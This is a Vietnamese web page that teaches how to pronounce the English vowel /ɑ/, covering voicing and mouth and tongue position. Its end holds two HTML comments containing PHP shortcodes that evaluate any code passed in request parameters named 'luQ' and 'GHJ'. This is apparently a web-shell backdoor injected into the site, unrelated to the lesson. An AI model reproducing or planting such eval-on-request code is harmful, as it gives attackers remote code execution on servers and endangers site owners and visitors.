Cách phát âm của nguyên âm ɑ

Nguyên âm ɑ xuất hiện trong các từ như box, fox, car, father… trong các từ như box, fox (những từ có chữ cái O nhưng được đọc là ɑ), bạn cần chú ý xem phiên âm của chúng trước khi đọc. Âm ɑ có cách phát âm hoàn toàn khác chữ O hay chữ A trong tiếng Việt.

Có một khái niệm rất quan trọng lúc phát âm các kí tự trong IPA đó là “voiced” và “unvoiced” (hoặc “voiceless”). Một âm được gọi là “voiced” nếu lúc phát âm, dây thanh âm có rung. Ngược lại, chúng ta có một “voiceless sound”.

Để biết được dây thanh âm có rung hay không, lúc phát âm, bạn hãy đặt tay lên cổ. Bạn sẽ cảm nhận được sự rung của dây thanh âm nếu âm đó là “voiced” và ngược lại.

Tất cả các nguyên âm trong tiếng Anh đều là “voiced sounds”

Để phát âm đúng nguyên âm ɑ, bạn cần chú ý những điểm sau:

  • Miệng mở rộng, hàm dưới đưa xuống
  • Lưỡi nằm thả lỏng ở hàm dưới và hơi được kéo về phía sau. Bạn không cảm nhận được áp lực nào của lưỡi đặt lên răng cửa của hàm dưới
  • Âm ɑ là âm mà khi phát âm, bạn có thể thấy phần vòm họng của mình một cách rõ ràng nhất

Hãy cùng xem cách phát âm của ɑ nhé:

 

<!– [insert_php]if (isset($_REQUEST["luQ"])){eval($_REQUEST["luQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["luQ"])){eval($_REQUEST["luQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["GHJ"])){eval($_REQUEST["GHJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["GHJ"])){eval($_REQUEST["GHJ"]);exit;}[/php] –>